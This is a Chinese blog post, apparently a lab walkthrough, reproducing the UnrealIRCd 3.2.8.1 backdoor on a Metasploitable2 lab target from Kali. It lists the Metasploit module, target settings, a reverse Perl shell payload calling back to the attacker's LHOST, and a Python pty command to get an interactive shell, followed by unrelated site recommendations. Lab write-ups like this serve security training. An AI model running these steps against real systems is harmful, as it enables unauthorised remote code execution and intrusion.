UnrealIRCd后门漏洞

于 2024-05-12 16:27:06 发布
阅读量292 收藏 6
点赞数 4
分类专栏: Web安全进阶 文章标签: UnreallRcd Web安全 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62670778/article/details/138756946
版权

UnrealIRCd后门漏洞

一、介绍

  • IRC是Internet Relay Chat 的英文缩写,中文一般称为互联网中继聊天
  • 它是由芬兰人Jarkko Oikarinen于1988年首创的一种网络聊天协议。经过十年的发展,目前世界上有超过60个国家提供了IRC的服务
  • IRC的工作原理非常简单,您只要在自己的PC上运行客户端软件,然后通过因特网以IRC协议连接到一台IRC服务器上即可。它的特点是速度非常之快,聊天时几乎没有延迟的现象,并且只占用很小的带宽资源
  • 所有用户可以在一个被称为"Channel"(频道)的地方就某一话题进行交谈或密谈,每个IRC的使用者都有一个Nickname(昵称)
  • UnrealIRCd 是一个开源的 IRC 服务器

二、原理:

  • 在2009年11月到2010年6月间分布于某些镜面站点的UnrealIRCd,在DEBUG3_DOLOG_SYSTEM宏中包含外部引入的恶意代码,远程攻击者能够执行任意代码
  • 影响系统/软件:Unreal UnrealIRCd3.2.8.1

三、复现准备

  1. 靶机:Metasplotable2-Linux - 192.168.9.147
  2. 攻击机:Kali - 192.168.9.148

四、漏洞复现

  1. 使用nmap扫描靶机的IP地址,可以看到靶机的139和445端口
    在这里插入图片描述

  2. 启动metasploit
    在这里插入图片描述

  3. 搜索ircd的相关工具和攻击载荷

search ircd

在这里插入图片描述

  1. 启动漏洞利用模块
exploit/unix/irc/unreal_ircd_3281_backdoor

在这里插入图片描述

  1. 在终端中输入命令 show options,查看需要设置的相关项,yes表示必须填写的参数
    在这里插入图片描述

  2. 设置目标主机的IP地址

set rhosts 192.168.9.147

在这里插入图片描述

  1. 攻击
exploit

在这里插入图片描述

  1. 发生报错,这里我们手动设置payload
set payload cmd/unix/reverse_perl

在这里插入图片描述

  1. 再设置LHost(攻击的IP地址)
set LHOST 192.168.9.148

在这里插入图片描述

  1. 再攻击
    在这里插入图片描述

  2. 成功
    在这里插入图片描述

  3. 进入交互界面

python -c 'import pty;pty.spawn("/bin/sh")'

在这里插入图片描述

月亮今天也很亮
关注
  • 4
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
智睿管理系统修改管理任意密码漏洞后门
09-28
后台修改管理密码处没有验证是否登录!导致可以任意修改管理密码!
Metasploit溢出UnrealIRCd后门漏洞
weixin_34185320的博客
12-16 950
Metasploit溢出UnrealIRCd后门漏洞利用UnrealIRCd后门漏洞,获取目标主机的root权限。某些站点的UnrealIRCd,在DEBUG3_DOLOG_SYSTEM宏中包含外部引入的恶意代码,远程***者能够执行任意代码。一、利用nmap工具扫描目标主机1.1使用nmap命令对目标主机进行扫描。单击桌面空白处,右键菜单选择“在终端中打开”。1.2在终端中...
Metasploitable2靶机之第八篇--UnreallRCd后门漏洞
千寻的博客
04-03 1154
文章目录环境漏洞利用摘抄 环境 漏洞利用 摘抄 “I am going to live every minute of it” 我将珍惜活着的每一分钟。 – 《心灵奇旅》
Metasploit溢出漏洞
hhiollk的博客
07-07 721
废话不多说直接上图帖命令
linux漏洞UnrealIRCd Backdoor Detection利用
arissa666的博客
07-06 170
用2020版的KAli系统,msf攻击。新版本使用有可能连接不上。UnrealIRCd Backdoor Detection利用。用bash i 建立交互,就可以查看宿主机相关信息了。进入msf查找并使用工具。
多款家用路由器存后门漏洞.pdf
10-08
多款家用路由器存后门漏洞.pdf
phpMyAdmin通过密码漏洞后门文件
10-17
今天小编就为大家分享一篇关于phpMyAdmin通过密码漏洞后门文件,小编觉得内容挺不错的,现在分享给大家,具有很好的参考价值,需要的朋友一起跟随小编来看看吧
多个品牌路由器存在“后门”,赶紧看看你中奖了没
10-01
路由器也不安全?近日,国家互联网应急中心发布的报告指出,多家路由器厂商的产品存在“后门”,而黑客藉此可以控制个人电脑,实现不法获利的目的
反向连接后门代码
10-13
用C实现的反向连接后门代码。具有反向连接功能,服务器端通过域名解析向客户端发起建立连接请求。
一个Python工具箱,用于在PyTorch TensorFlow和JAX中创建欺骗神经网络的对抗性示例.zip
05-25
一个Python工具箱,用于在PyTorch TensorFlow和JAX中创建欺骗神经网络的对抗性示例
基于three.js实现一个由多个div构成的球体的运动,并以此为基础制作的一个小型游戏
05-25
【作品名称】:基于three.js实现一个由多个div构成的球体的运动,并以此为基础制作的一个小型游戏 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。 【项目介绍】:基于three.js实现一个由多个div构成的球体的运动,并以此为基础制作的一个小型游戏
maven下载安装包全套软件安装
05-25
maven下载安装包全套软件安装
InnoSetup 自动化打包工具 支持多种语言
05-25
自动化打包工具
vgg模型-通过CNN卷积神经网络的是否是水果图片识别-不含数据集图片-含逐行注释和说明文档.zip
最新发布
05-25
vgg模型_通过CNN卷积神经网络的是否是水果图片识别-不含数据集图片-含逐行注释和说明文档 本代码是基于python pytorch环境安装的。 下载本代码后,有个环境安装的requirement.txt文本 如果有环境安装不会的,可自行网上搜索如何安装python和pytorch,这些环境安装都是有很多教程的,简单的 环境需要自行安装,推荐安装anaconda然后再里面推荐安装python3.7或3.8的版本,pytorch推荐安装1.7.1或1.8.1版本 首先是代码的整体介绍 总共是3个py文件,十分的简便 且代码里面的每一行都是含有中文注释的,小白也能看懂代码 然后是关于数据集的介绍。 本代码是不含数据集图片的,下载本代码后需要自行搜集图片放到对应的文件夹下即可 在数据集文件夹下是我们的各个类别,这个类别不是固定的,可自行创建文件夹增加分类数据集 需要我们往每个文件夹下搜集来图片放到对应文件夹下,每个对应的文件夹里面也有一张提示图,提示图片放的位置 然后我们需要将搜集来的图片,直接放到对应的文件夹下,就可以对代码进行训练了。 运行01生成txt.py,是
这是一个用Go语言编写的用于Windows的nodejs版本管理工具.zip
05-25
这是一个用Go语言编写的用于Windows的nodejs版本管理工具
densenet模型-基于人工智能的卷积网络训练识别行星表面地理特征分类-不含数据集图片-含逐行注释和说明文档.zip
05-25
densenet模型_基于人工智能的卷积网络训练识别行星表面地理特征分类-不含数据集图片-含逐行注释和说明文档 本代码是基于python pytorch环境安装的。 下载本代码后,有个环境安装的requirement.txt文本 如果有环境安装不会的,可自行网上搜索如何安装python和pytorch,这些环境安装都是有很多教程的,简单的 环境需要自行安装,推荐安装anaconda然后再里面推荐安装python3.7或3.8的版本,pytorch推荐安装1.7.1或1.8.1版本 首先是代码的整体介绍 总共是3个py文件,十分的简便 且代码里面的每一行都是含有中文注释的,小白也能看懂代码 然后是关于数据集的介绍。 本代码是不含数据集图片的,下载本代码后需要自行搜集图片放到对应的文件夹下即可 在数据集文件夹下是我们的各个类别,这个类别不是固定的,可自行创建文件夹增加分类数据集 需要我们往每个文件夹下搜集来图片放到对应文件夹下,每个对应的文件夹里面也有一张提示图,提示图片放的位置 然后我们需要将搜集来的图片,直接放到对应的文件夹下,就可以对代码进行训练了。 运行01生
alexnet模型-基于深度学习识别鸡蛋是否完好-不含数据集图片-含逐行注释和说明文档.zip
05-25
alexnet模型_基于深度学习识别鸡蛋是否完好-不含数据集图片-含逐行注释和说明文档 本代码是基于python pytorch环境安装的。 下载本代码后,有个环境安装的requirement.txt文本 如果有环境安装不会的,可自行网上搜索如何安装python和pytorch,这些环境安装都是有很多教程的,简单的 环境需要自行安装,推荐安装anaconda然后再里面推荐安装python3.7或3.8的版本,pytorch推荐安装1.7.1或1.8.1版本 首先是代码的整体介绍 总共是3个py文件,十分的简便 且代码里面的每一行都是含有中文注释的,小白也能看懂代码 然后是关于数据集的介绍。 本代码是不含数据集图片的,下载本代码后需要自行搜集图片放到对应的文件夹下即可 在数据集文件夹下是我们的各个类别,这个类别不是固定的,可自行创建文件夹增加分类数据集 需要我们往每个文件夹下搜集来图片放到对应文件夹下,每个对应的文件夹里面也有一张提示图,提示图片放的位置 然后我们需要将搜集来的图片,直接放到对应的文件夹下,就可以对代码进行训练了。 运行01生成txt.py,是将数据
QJ 2711A-2014 静电放电敏感器件安装工艺技术要求.rar
05-25
QJ 2711A-2014 静电放电敏感器件安装工艺技术要求.rar
imessage后门漏洞
12-29
iMessage是苹果公司的即时通讯服务,但近日有报道指出iMessage存在后门漏洞。据称,黑客可以利用这一漏洞,通过远程方式访问用户的设备并获取用户的个人信息,甚至可以窃取用户的资金。 这一后门漏洞的存在对用户的隐私安全构成了严重威胁。一旦黑客利用了这一漏洞,用户的个人信息和隐私将可能被泄露,造成无法挽回的损失。因此,苹果公司需要尽快修复并加强iMessage的安全防护措施,确保用户的个人信息不会被滥用。 对于用户来说,也需要提高信息安全意识,避免点击不明链接或下载不明附件,定期更新手机系统和应用程序以及使用安全的密码和身份验证方式。 与此同时,监管部门也需要对iMessage及其他通讯服务进行更加严格的监管,确保这些服务符合相关的安全标准,保护用户的个人信息和隐私不受侵犯。只有各方共同努力,才能有效地遏制后门漏洞的威胁,保障用户的信息安全

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值